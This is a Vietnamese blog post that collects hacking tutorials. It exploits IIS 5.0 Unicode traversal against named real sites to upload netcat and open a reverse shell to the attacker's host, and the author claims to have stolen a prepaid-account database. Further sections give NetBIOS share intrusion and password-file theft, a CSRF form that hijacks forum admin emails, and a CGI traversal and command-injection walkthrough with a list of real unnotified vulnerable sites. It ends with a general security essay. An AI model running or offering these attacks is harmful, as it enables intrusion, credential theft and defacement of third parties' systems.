Thứ Hai, 7 tháng 2, 2011

Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0

Kinh nghiệm khi Hack Windows 2000 Server IIS 5.0 :
Qua nghiên cứu cách upload/download file trên một số Server khi tìm cách hack website http://www.cantho1260.net/ và http://www.cantho.gov.vn/ sử dụng Windows 2000 Server chưa patch lỗi thì tôi nhận thấy có một số kinh nghiệm sau đây xin viết vài dòng để chia sẻ cùng với anh em và nếu có thiếu xót xin bổ sung cho. Để Upload netcat lên dùng TFTP thì đơn giản, nhưng trước tiên chúng ta phải cài TFTP server trên system (203.162.30.219). Sau đó cho thi hành các lệnh sau đây trên system của Victim bằng cách dùng một số lỗi như System Traversal của Unicode Exploit chẳng hạn:
GET /scripts/..%c0%af…/winnt/system32/tftp.exe?”-1”+203.162.30.219+GET+nc.exe C:\nc.exe HTTP/1.0
Ví dụ trên sẽ trỏ đến C:\ vì đây là thư mục mà ai cũng có thể Write vào được không có Permit phải là Admin hay không. Nếu Netcat đã có sẵn bạn sẽ nhận được một thông báo là “tftp.exe: can’t write to C:\nc.exe”, nhưng nếu thành công thì Browser sẽ trả về lỗi “HTTP 502 Gateway Error” và một Message là: “ Transfer successful: 59392 byte in x second, 59392 bytes/3s.” Dùng FTP thì hơi nhọc công hơn vì phải qua một trung gian, hãy tạo một file tên gì cũng được trên máy Victim để dùng FTP script với command là –s: [filename] sau đó Script sẽ giúp cho FTP Clien connect đến máy chúng ta để download netcat về local của Host. Trước khi tạo file này chúng ta chắc chắn là sẽ bị cản trở. Và để vượt qua thì có một mẹo nhỏ là hãy copy đổi tên file cmd.exe thành một tên khác trước đã.
GET /scripts/..%c0%af.../winnt/system32/cmd.exe?+/c+copy+c:\winnt\system32\cmd.exe+c:\aclatinh.exe HTTP/1.0
OK! File cmd.exe bây giờ đã được copy sang một bản khác có tên là aclatinh.exe, bây giờ chúng ta lại phải ghi vào C:\ vì như đã nói là đây là nơi mà bất cứ ai cũng có thể write vào. Bây giờ phải tạo một file FTP script bằng cách dùng lệnh echo. Sau đây là một nội dung của một file Script, chúng ta sẽ chọn tên file là ftpaclatinh và username của FTP là anonymous, password là a@a.com, FTP server là 192.168.2.31.

GET /scripts/...%0c%af../aclatinh.exe?+/c+echo+anonymous>C:\ftpaclatinh&&echo+a@a.com>C:\ftpaclatinh&echo+ bin>>C:\ftpaclatinh&&echo+get+test.txt+C:\nc.exe>>C:\ftpacla tinh&&echo+Bye>>C:\ftpaclatinh&&ftp+s:C:\ftpaclatinh+192.168.234.31&&del+C:\ftpaclatinh
OK! Sau khi thực hiện script trên nó sẽ copy netcat đến C:\ trên Server và xóa luôn file script ftpaclatinh để tránh bị phát hiện. Nhưng lưu ý là từ dòng thứ 2 phải dùng “>>”để bố sung thêm vào ftpaclatinh chứ không phải là “>”.
_ Tạo file bằng lệnh echo: Dĩ nhiên là nếu FTP và TFTP không có sẵn, trường hợp này chỉ xảy ra đối với một số admin có tính “tào tháo” hay bị Block bởi firewall chẳng hạn thì chúng ta phải dùng lệnh Echo để gõ từng dòng lệnh vào ví dụ như là nội dung của file cmd.asp chẳng hạn thì cách làm như sau: để tạo file thì gõ vào “echo nộidung > c:\tenfile & vol” và để thêm nội dung vào file trên thì gõ vào: echo nộidung >> c:\tenfile & vol và cứ thế tuy lâu nhưng còn hơn không làm được gì. Và một hacker có tên là Relof Temmingh cũng có viết sẵn một Scritp cho Unicode Exploit dưới dạng ngôn ngữ Perl có tên là “cgidecodeloader.pl” cũng dùng cách echo và gián tiếp để tạo ra 2 file là upload.asp và upload.inc cho phép upload dựa trên Browser thuận tiện (và ông ta cũng có viết một Script là “unicodeexcute.pl” cho phép hacker thi hành lệnh từ xa). Dùng unicodeloder.pl thì trước tiên phải chắc chắn là hai file upload.asp và upload.inc phải có cùng trong thư mục chứa file unicodeloader.pl và cần xác định thư mục nào của Server cho phép Writable và excutable đã thường thì nó là C:\intetpub\scripts, là default khi install Windows2000.
C:\>Perl unicodeloader.pl
Usage: unicodeloader IP:port webroot
C:\>Perl unicodeloader.pl cantho1260.net:80 C:\inetpub\scripts
Creating uploading webpage on victim.com on port 80.
The webroot is C:\inetpub\scripts.
testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
farmer brown directory: c:\inetpub\scripts
'-au' is not recognized as an internal or external command,
operable program or batch file.
sensepost.exe found on system
uploading ASP section:
..............
uploading the INC section: (this may take a while)
.................................................................................
upload page created.
Now simply surf to caesars/upload.asp and enjoy.
Files will be uploaded to C:\inetpub\scripts
Và chúng ta hãy khảo xác cách nó làm việc. Trước tiên nó sẽ copy cmd.exe thành một file có tên là “sensepost.exe” đến thư mục đã xác định là Webroot, ở đây là C:\Intetpub\scripts\ sau đó nó bypass qua cmd.exe gián tiếp (“>”) qua exploit . sensepost.exe được dùng để echo và gián tiếp 2 file upload.asp va upload.inc từng dòng mã một trong hai file để vào thư mục Wroot (ở đây là C:\Inetpub\script) và bây giờ thì hai file trên đã có mặt trên Server chỉ cần trỏ Browser đến đó để upload cmd.asp và ntdaddy.asp mà thôi.
http://www.cantho1260.net/scripts/upload.asp
http://www.cantho1260.net/scripts/cmdasp.asp
Khi đã Upload Netcat (nc.exe) rồi thì chúng ta sẽ cho netcat listen trên máy của mình:
C:\nc.exe –l –p 2002
Và sau đó dùng lại dùng cmd để shovel Netcat listenning trở về máy ta bằng cách thi hành Netcat trên Server thông qua Cmd.asp qua Browser:
C:\inetpub\scripts\nc.exe –v –e cmd.exe cantho1260.net 2002
Tuy thế nhưng tôi chỉ kịp download về mỗi một file Access chứa account prepaid thôi thì Server nó đã Fix lại rồi. Đến nay thì file đó cũng bị Broke hư mất khi defrag đĩa cứng! Uổng quá!

Xâm nhập PC khác khi đang Online

Xâm nhập PC khác khi đang Online :
Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice.
Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows thông qua Internet và có thể lấy thông tin của chúng.
Công cụ cần thiết :
Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner. Tôi dùng Legion hoặc Winhackgold ( Download ở đây ). Chương trình sẽ scan tất cả các máy có mở chia sẻ file trên cùng một netbios.
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ nhận được một địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu bạn kết nối bằng Modem thì số IP này sẽ thay đổi gọi là IP động.Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP của mình vào. Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11 thôi. Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP bất kì bạn đánh vào, bạn nên đánh số gần nhất với IP của mình, tôi chọn số 12).
Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP nó tìm thấy 1 - 254. Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn sẽ nhìn thấy như sau :
Sharename Type Comment
----------------------------------------------
A Disk Floppy
CDRIVE Disk C:\ Drive
DDRIVE Disk D:\ Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully.
Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền kiểm soát địa chỉ IP đó.
Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:
NET USE [drive: | *] [\\computer\directory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE [port:] [\\computer\printer [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE drive: | \\computer\directory /DELETE [/YES]
NET USE port: | \\computer\printer /DELETE [/YES]
NET USE * /DELETE [/YES]
NET USE drive: | * /HOME
drive Specifies the drive letter you assign to ashared directory.
* Specifies the next available drive letter.
If used with /DELETE, specifies to disconnect all of your connections.port Specifies the parallel (LPT) port name you assign to a shared printer.computer Specifies the name of the computer sharing the resource.directory Specifies the name of the shared directory.printer Specifies the name of the shared printer.password Specifies the password for the shared resource, if any.
? Specifies that you want to be prompted for the password of the shared resource. You don't need to use this option unless the password is optional.
/SAVEPW:NO Specifies that the password you typeshould not be saved in your password-listfile. You need to retype the password the next time you connect to this resource.
/YES Carries out the NET USE command without first prompting you to provide information or confirm actions.
/DELETE Breaks the specified connection to a shared resource.
/NO Carries out the NET USE command, responding with NO automatically when you are prompted to confirm actions.
/HOME Makes a connection to your HOME directory if one is specified in your LAN Manager or Windows NT user account.
To list all of your connections, type NET USE without options.
To see this information one screen at a time, type the following at the command prompt:
NET USE /? | MORE
or
NET HELP USE | MORE
Sau khi xâm nhập bạn cần lấy các thông tin của IP này ! Hãy vào những cái có kiểu \program files\cutètp\tree.dat, \mirc\download, windows\*.pwl ...
                       

Hack IBF

Hack IBF :
Có thể dùng đoạn script này :

<script language=JavaScript1.1>
<!-- var boodschap =':::> Copyright @ 2002 ... Minabond Design Read Code <:::';
function dgstatus()
{
window.status = boodschap;
timerID= setTimeout("dgstatus()",100);
}
dgstatus();
--> </SCRIPT>
<script language="JavaScript">
<!-- function MM_openBrWindow(theURL,winName,features)
{
//v2.0 window.open(theURL,winName,features);
} //-->
</script>
<script LANGUAGE="JavaScript">
<!-- document.oncontextmenu = function()
{return false}
 if(document.layers)
{ window.captureEvents(Event.MOUSEDOWN);
 window.onmousedown = function(e)
{ if(e.target==document)return false;
}
} else
{ document.onmousedown = function(){return false}
 }
// --> </script> </tr>
<form action="http://www.yenhoa.com/index.php" method="post" target="a1" name='form1'>
<input type='hidden' name='act' value='UserCP'>
 <input type='hidden' name='CODE' value='09'>
 <input type='hidden' name='s' value='453be091bae994e3d64542e82ec494b7'>
 <tr> <td class='row1' width='70%' align='left'>
<input type='hidden' name='in_email_1' value=*****@yahoo.com' class='forminput'><
/td> </tr> <tr>
<td class='row1' width='70%' align='left'>
<input type='hidden' name='in_email_2' value='*****@yahoo.com' class='forminput'>
</td> </tr> <tr>
<td class='row2' align='center' colspan='2'>
<input type="submit" name='change_email' value=" Continue " class='forminput'>
</td> </tr> </form>
<!-- end main CP area --> </table> </td> </tr> </table> </td> </tr> </table>
<script language='Javascript'>
 <!-- function jump_page(internal)
 {
var f = document.jumpForm.themenu;
 if (f.options[f.selectedIndex].value == -1)
{
return false;
}
var l_data = f.options[f.selectedIndex].value; s_data = l_data.split("|"); if (s_data[0] == 0) { window.location = base_url + s_data[1];
} else
{
window.open( s_data[1], 'width=800,height=600,top=0,left=0,resizable=1,scrollbars=1,
location=yes,directories=yes,status=yes,menubar=yes,toolbar=yes');
} }
--> </script>
  Đọc kĩ chú ý, - thay tên forum backkhoa.org = tên victim và -453be091bae994e3d64542e82ec494b7 đây chính là đoạn mã ngẫu nhiêu board tự động chạy trên lí thuyết nó luôn luôn thay đổi nhưng chúng ta hoàn toàn có thể sử dụng được một trong những string ngẫu nhiên board sinh ra chắc hẳn các bạn nhìn thấy cái này -*****@yahoo.com hãy thay nó bằng địa chỉ mail của bạn . đọc kĩ hơn một chút chắc hẳn ta đã nhận ra công dụng của đoạn code này? đúng nó thay đổi email của admin diễn đàn một khi admin đó bị mặc lừa. Nói cách khác cách này hoàn toàn là lừa đảo chỉ với một câu nói khiêu khích thách thức admin.Nếu không tỉnh táo sẽ mắc lừa và email sẽ bị thay đổi lúc đó dùng chức năng forgotpass để lấy pass và.....hack hết không còn gì để giải thích.      

HACK WEB-FORUM

Web Hacking, Brief Introduction :

Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều có nhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng như thực hiện các cuộc giao dịch buôn bán online. Vấn đề nảy sinh là khi phạm vi ứng dụng của các web application ngày càng phổ biến thì khả năng xuất hiện lỗi và bị tấn công càng cao. Trong các lĩnh vực hacking, hack web application là sân chơi khá lý thú cho những ai yêu thích computer security.
Thông thường, những bước cơ bản khi thực hiện hack web bao gồm như sau - các bước này không nhất thiết phải thực hiện tuần tự mà tùy vào điều kiện của chúng ta.
1. Thu thập thông tin ở mức trên về hạ tầng của mục tiêu
Bước này ta cần thu thập một số thông tin quan trọng như có bao nhiêu server, mô hình của các web server, các client nào sẽ tương tác với ứng dụng web, kiểu giao tiếp thông tin (transport) và thông qua các cổng (port) nào, những site liên quan đến việc thực hiện chức năng của site mục tiêu....
2. Khảo sát ứng dụng web
Ở đây tôi chỉ mô tả một trong những phương pháp khảo sát khá phổ biến từ trước đến giờ, đó là Xem mã nguồn và lợi dụng các lỗi cho phép xem mã nguồn.Một số ngôn ngữ web thông dụng hiện nay có nhiều lỗi này như Active Server Pages (ASP),Common Gateway Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP).
Bài viết này tôi chỉ đề cập đến 1 bug đã có từ lâu nhưng thấy vẫn còn nhiều site mắc phải, đó là lỗi liên quan đến CGI  design cho phép view source và file system traversal. Hãy xem ví dụ sau:
http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=contact.htm_2ft_blank
Ở đây index.cgi được gọi với tham số truyền vào là trang contact.htm (HTML file) nó sẽ đọc và hiện nội dung của trang này lên client browser. Tuy nhiên nếu người viết cgi không kiểm tra kĩ lưỡng, ta có thể lợi dụng để xem chính nội dung của file index.cgi hay các trang khác. Ví dụ sau ta sẽ thay contact.htm bằng index.cgi: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=index.cgi_2ft_blank
Ở đây ta gặp 1 thông báo lỗi "error: No such file or directory /web/guide/earthdayalliance/www/content/index.cgi", nguyên nhân là thực tế index.cgi không nằm trong thư mục hiện hành (tức là ../www/content/) mà nằm ở www, do đó ta sẽ chỉnh lại link 1 chút bằng 1 dot dot slash, như sau: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2f.._2findex.cgi_2ft_blank
Chạy link này ta sẽ thấy nội dung của index.cgi được show trên browser. Việc xem được source có thể giúp ta tìm hiểu kĩ càng hơn về web app, thậm chí nếu may mắn có thể xem được những thông tin quan trọng khác. Lệnh sau là 1 ví dụ dùng lỗi này để xem file etc/passwd trong unix server:
http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank
Đây chỉ là 1 ví dụ nhỏ, còn khai thác hay hạn chế thế nào thì tùy khả năng của mỗi người.
Các bạn có thể tìm các site bị lỗi này bằng cách dùng
http://k.domaindlx.com/clairsang/www.google.com/t_blank, search từ khóa liên quan, chẳng hạn như: "index.cgi?page="
Đây là vài link tôi tìm thấy, các bạn có thể tham khảo: http://k.domaindlx.com/clairsang/www.discountdata.com/index.cgi@page=index.cgi_2ft_blank http://k.domaindlx.com/clairsang/home.no.net/danm2/freezeware/index.cgi@page=leecher.html_2ft_blank http://k.domaindlx.com/clairsang/home.no.net/danm2/freezeware/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/itf.fys.kuleuven.ac.be/workshop2002/index.cgi@page=practical.htm_2ft_blank http://k.domaindlx.com/clairsang/itf.fys.kuleuven.ac.be/workshop2002/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/www.resource.nl/uk/index.cgi@page=index.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=contact.htm_2ft_blank http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/www.nestingeagles.com/index.cgi@page=videob.htm_2ft_blank http://k.domaindlx.com/clairsang/www.nestingeagles.com/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.nestingeagles.com/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/www.warehousejewelry.com/cgi-bin/index.cgi@page=privacy_policy.htm_2ft_blank http://k.domaindlx.com/clairsang/www.warehousejewelry.com/cgi-bin/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.warehousejewelry.com/cgi-bin/index.cgi@page=_2f.._2f._2fadmin_2fconfiguration.pl_2ft_blank http://k.domaindlx.com/clairsang/www.warehousejewelry.com/cgi-bin/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/demo1.secmod.com/index.cgi@page=links.html_2ft_blank http://k.domaindlx.com/clairsang/demo1.secmod.com/index.cgi@page=index.cgi_2ft_blank http://k.domaindlx.com/clairsang/demo1.secmod.com/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/www.vintagejournal.com/vj0901/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.vintagejournal.com/vj0901/index.cgi@page=home.htm_2ft_blank http://k.domaindlx.com/clairsang/www.datadart.com/commercesql/index.cgi@page=stk%20datasheets.html&car_2ft_blank http://k.domaindlx.com/clairsang/www.datadart.com/commercesql/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.gatlinburggateway.com/index.cgi@&page=_2f.._2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/www.berkshire-is.com/index.cgi@page=news.html_2ft_blank http://k.domaindlx.com/clairsang/www.berkshire-is.com/index.cgi@page=index.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.berkshire-is.com/index.cgi@page=_2f.._2f.._2f.._2f.._2f.._2fetc_2fpasswd_2ft_blank http://k.domaindlx.com/clairsang/www.smokymtnarts-crafts.com/index.cgi@page=otto.htm_2ft_blank http://k.domaindlx.com/clairsang/www.smokymtnarts-crafts.com/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.textileflags.com/cgi-bin/rock_flag_store/index.cgi@page=flagsbyname.html_2ft_blank http://k.domaindlx.com/clairsang/www.textileflags.com/cgi-bin/rock_flag_store/index.cgi@page=_2f.._2findex.cgi_2ft_blank http://k.domaindlx.com/clairsang/www.randalloglegallery.com/index.cgi@page=about.htm_2ft_blank http://k.domaindlx.com/clairsang/www.randalloglegallery.com/index.cgi@page=_2f.._2findex.cgi_2ft_blank
.....
Lưu ý các site trên chưa được thông báo về lỗi này.
3. Tấn công các web server
4. Tấn công vượt qua các cơ chế kiểm soát (authentication, authorization)
Bao gồm các phương pháp như đoán mật khẩu, làm việc - thay đổi thông tin cookies, các kĩ thuật directory traversal, leo thang đặc quyền, các phương pháp tấn công dựa vào SQL, SQL injection...
5. Tìm hiểu sâu về các chức năng của ứng dụng web
Tìm hiểu cách thực hiện của các phần trong ứng dụng, đặc biệt như các order input, confirmation, order tracking. Ở đây ta có thể áp dụng các phương pháp như SQL Injection, input validation...
6. Tìm hiểu luồng di chuyển của thông tin
Các thông tin tương tác giữa client và server, các thông tin tương tác với database.
Hiện nay việc viết mã để thực hiện việc giao tiếp thông tin thường phải đảm bảo được tính hiệu quả (nhanh),và bảo mật (có thể sẽ chậm hơn). Thường thì tính hiệu quả được ưu tiên hơn do đó có thể sẽ phát sinh lỗi trong quá trình đó và giúp hacker có thể lợi dụng các lỗi như SQL input...để đoạt quyền điều khiển hệ thống.
7. Tấn công trang của người quản lý hệ thống
8. Tấn công client
9.
Thực hiện tấn công từ chối dịch vụ Denial-of-Service (DoS)
Đây là cách cuối cùng khi các phương pháp trên không thực hiện thành công.


Phần này cần các bạn có kiến thức chút đỉnh về Unix.
Bước tiếp theo là khai thác khả năng command execution từ client browser thông qua HTTP port.
Ở đây các bạn chú ý các kí tự đặc biệt hữu ích khi ta cần thực hiện lệnh trong URL, đó là: newline character (%0a), pipe (%7c), semicolon (%3b), ampersand (%26). Newline char cho phép ta ngắt các lệnh ra thành nhiều dòng khi thực hiện, dùng khi ta kết nhiều lệnh cùng trên cùng 1 dòng; pipe dùng để kết nối nhiều lệnh unix với nhau, tương tự với semicolon; ampersand thường dùng để ngăn cách các tham số truyền vào câu lệnh...Các bạn tự tìm hiểu kĩ hơn các thông tin này.
Tiếp theo vd ở post đầu, đó là: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=contact.htm_2ft_blank
Bây giờ ta thử gọi 1 lệnh liệt kê thông tin thư mục của unix (ls):
http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2ft_blank|ls|
Ta sẽ thấy browser liệt kê ra các file, thư mục có trong thư mục hiện hành của trang web, đại khái như sau:
[badurl.htm contact.txt content count_file edcpressrelease.htm greentemplate.htm guestbook images index.cgi newtemplate.htm registercircle.txt search.html template.htm templates welcome.htm wwwboard ]
Nếu muốn biết rõ hơn về thông tin của file, như quyền hạn, ngày tháng...ta dùng lệnh ls -la, cụ thể URL sẽ là: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2ft_blank|ls+-la|
Một vd của việc khai thác tiếp theo: ta thấy thư mục wwwboard, đây là 1 dạng webforum đơn giản, ta xem thử nội dung thư mục này: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2ft_blank|ls%20wwwboard|
Ở đây ta sẽ thấy liệt kê ra content của forum này, trong đó có 1 file passwd.txt, ta muốn xem nội dung file này, chỉ việc thực hiện: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2f.._2fwwwboard_2fpasswd.txt_2ft_blank
Lưu ý ta thêm /../ phía trước vì muốn lùi 1 cấp trở về thư mục cha.
Thế là bạn vừa xem được pass admin của forum dạng này.
Đây là 1 thông tin tìm hiểu khác: http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2ft_blank|ls%20/../../../../../etc+-la|
Liệt kê các user trong server này:
http://k.domaindlx.com/clairsang/www.earthdayalliance.org/index.cgi@page=_2ft_blank|ls+/../../.././web/guide+-al|
.....

Bước khai thác kế tiếp dành cho các bạn: Thực hiện nhiều câu lệnh, get shell... Chúc thành công.

Các công cụ có thể áp dụng trong web hacking các bạn có thể tìm hiểu ở trang:
http://k.domaindlx.com/clairsang/www.hackingexposed.com/tools/tools.html/t_blank
Một tài liệu nhỏ về web hacking khác (đây là tài liệu English, đọc bằng chương trình Microsoft
powerpoint trong bộ Microsoft Office): webhacking.zip
Tôi sẽ giới thiệu các bạn 1 thủ thuật nho nhỏ để tạo 1 file dạng text khi ta có thể run được  command trên remote server. Cách này có thể áp dụng với cả nt và unix. Với NT, tôi đã từng thực hiện thành công khi hack các server hosting controller trước đây, khi đó tôi dùng cách này để tạo 1 file script ftp, sau đó gọi lệnh ftp để chạy script này.
Ở đây tôi sẽ nêu ví dụ tạo 1 link cho site bị lỗi CGI File System Traversal tôi đã post.
Các bạn theo dõi link sau:
ta sẽ thấy nó liệt kê ra nội dung của file passwd (đã shadowed). Vì site này có tên là nestingeagles.com nên tôi sẽ search "nestingeagles" trong list vừa liệt kê trong passwd, ta sẽ thấy:
....
marlonsand:*:354:102:,,,,:/mnt/web/guide/turboprofits:/bin/false
bibscalp:*:356:102:,,,,:/mnt/web/guide/bibscalpproducts:/bin/suspended
nestingeagle:*:357:102:,,,,:/mnt/web/guide/nestingeagles:/bin/bash
twostr:*:359:102:,,,,:/mnt/web/guide/twostreetmusic:/bin/suspended
srinc:*:361:102:,,,,:/mnt/web/guide/summationresearch:/bin/false
....

Ta chú ý đến đường dẫn của website này: : /mnt/web/guide/nestingeagles, từ đây ta sẽ dùng lệnh ls để xem nó, như sau:
sẽ liệt kê các thông tin về thư mục và file của site này, tìm hiểu thêm ta sẽ biết được main
index của site nằm trong /wwwfp/, ta lại liệt kê: http://k.domaindlx.com/clairsang/www.nestingeagles.com/index.cgi@page=_2ft_blank|ls%20/../../../../mnt/web/guide/nestingeagles/wwwfp| . Ok, bây giờ ta có thể thực hiên các lệnh tạo, xóa...main index của website trong thư mục này. Ta sẽ thử tìm cách tạo link a.htm.
Lệnh tôi giới thiệu ở đây là echo. Lệnh echo sẽ hiện 1 message ra standard output hoặc ra file.
Command dùng trong trường hợp này như sau: echo [message] >> [filename], nếu muốn thêm vào file có sẵn, bạn chỉ việc gọi tiếp lệnh echo với file đã có, nhưng với message (nội dung) khác.
http://k.domaindlx.com/clairsang/www.nestingeagles.com/index.cgi@page=_2ft_blank|echo%20This+is+a|test%20>>%20/../../../../
mnt/web/guide/nestingeagles/wwwfp/a.htm|
Nếu thành công, bạn sẽ thấy link sau:
http://k.domaindlx.com/clairsang/www.nestingeagles.com/a.htm/t_blank

Bây giờ các bạn thấy lệnh echo hữu dụng thế nào rồi chứ, ta có thể tạo link mà chẳng cần tool gì remote cả ngoại trừ browser.
Lưu ý các bạn khi test nên tránh dùng các lệnh xoá dữ liệu hoặc tạo file đè mất các file người ta có sẵn, cũng đừng nên quá lạm dụng lệnh để tạo nhiều link sẽ sớm bị phát hiện.


How Hackers/Crackers Break Into Your System ?


Trong vài năm trở lại đây thì vấn đề an toàn trên mạng thu hút được rất nhiều sự quan tâm. Sự hỗn độn và thay đổi chóng mặt của internet là yếu tố chính là cho người dùng và các doanh nghiệp phải tự mình tăng cường khả năng bảo mật cho máy tính và hệ thống mạng của họ.
Cách đây 10 năm, những người đã cài đặt các hệ thống máy chủ có rất ít hiểu biết và kỹ năng về bảo mật. Và ngay cả hiện nay, trong số những người vẫn thường cài đặt hệ thống máy chủ vẫn còn rất nhiều thiếu kinh nghiệm về bảo mật.
Những người dung bình thường được trấn an bởi những thông báo từ các công ty lớn về các phương pháp bảo mật của họ. Nhưng không thể chối cãi được sự thật rằng hang tháng chúng ta lại có thêm những thông tin rằng hacker lại đột nhập vào đâu đó và lấy cắp thông tin.
Nhưng tại sao chúng ta lại phải quan tâm đến vấn đề đó. Tôi có thể nói về sự nghiêm trọng của việc deface (??) các trang web, ăn trộm các thông tin bí mật của công ty hay đột nhập vào các hệ thống của chính phủ, nhưng đơn giản hơn hãy để ý đến các lý do cá nhân mà chúng ta vần phải quan tâm.
Bây giờ xin đạt một câu hỏi. Bạn nghĩ thế nào về giá thị của các thông tin mà bạn có? Danh sách đối tác, email, số credit card hay các kế hoạch kinh doanh, báo cáo tài chính có ý nghĩa đối với bạn như thế nào?
Nếu tôi nói rằng tôi có thể đột nhập vào bất kỳ hệ thống nào, thì tôi có thể làm được những gì nhỉ? Tôi sẽ lấy số credit card để tiêu xài, thay đổi tài khoản ngân hàng của bạn. Tôi có thể làm cho bạn trở thành mất tích ở trên mạng. Tôi cũng có thể bán các thong tin bí mật cho đối thủ cạnh tranh của bạn, hay làm cho hệ thống của bạn ngừng hoạt động, như vậy bạn sẽ bị lỗ nặng .
Hoặc giả sử tôi là một nhân viên trong công ty của bạn, nhưng tôi bất mãn. Tôi có thể tấn công làm cho mạng không hoạt động, hay cài virus để cho bạn bị mất toàn bộ dữ liệu.
Bạn có chắc là chúng ta cần đến các biện pháp bảo mật không?
Vấn đề bảo mật có thể chia làm các nhóm sau:
1. Mạng và máy chủ bị cấu hình sai.
2. Hệ điều hành và ứng dụng bị lỗi.
3. Nhà cung cấp thiếu trách nhiệm
4. Thiếu những cá nhân đáng tin tưởng.
Cấu hình sai máy chủ:
Đây là nguyên nhân tạo ra đa phần các lỗ hổng bảo mật. Rất nhiều khi người quản trị không nhận biết được các dịch vụ đang chạy trên máy chủ của họ. Bạn có thể hỏi tại sao lại như vậy được? Hãy nghĩ đơn giản như chương trình Word, có bao nhiêu khả năng mà bạn biết được. Nếu biết một vài thứ cơ bản như viết macro thì bạn đã có thể trở thành người dung cao cấp rồi. Đa phần người dùng chỉ biết đến các tính năng cơ bản như lưu, xoá, đánh vần, kẻ bảng .v.v.
Tương tự như vậy đối với hệ điều hành và ứng dụng. Sự thay đổi nhanh chóng của công nghệ làm cho chỉ một số ít người có thể theo kịp. Và như thê thì các máy tính nối mạng hiển nhiên là đang đối mặt với nguy cơ bị xâm nhập.
Sau đây là một vài ví dụ về các ứng dụng và dich vụ:
Hệ thống in trên mạng.
Hệ thống điều khiển từ xa.
Chia xẻ file.
Các mã CGI và script ví dụ.
Khi những hệ thống này sử dụng các giá trị mặc định hoặc bị cấu hình sai thì sẽ là cơ hội tốt để kẻ xấu xâm nhập.
Lỗi trong các ứng dụng:
Những lỗi nảy sinh khi lập trình là một yếu tố làm cho ứng dụng vượt ra ngoài tầm kiểm soát của người sử dụng. Ví dụ như những lỗi của MS IIS hay trong ISC BIND hay SSH và rất nhiều lỗi khác nữa trong các hệ thống của Sun. Đơn gian hơn nữa là lỗi của OE mà bạn có thể trở thành mục tiêu của virus, hãy nhớ tới "I LOVE YOU" hay "Melissa".
Những nhà cung cấp thiếu trách nhiệm:
Rất nhiều nhà cung cấp không quan tâm đến điều gì xảy ra trong chượng trình của họ. Việc đảm bảo chất lượng (QA) trong ngành công nghiệp phần mềm rất yếu. Để tiết kiệm chi phí thì người ta thường không áp dụng những tiêu chuẩn về qui trình sản xuất. Thế thì ai phải chịu hậu quả của sự tối đầu của nhà cung cấp. Đó chính là các hệ thống mạng và máy tính bị phá hoại của bạn.
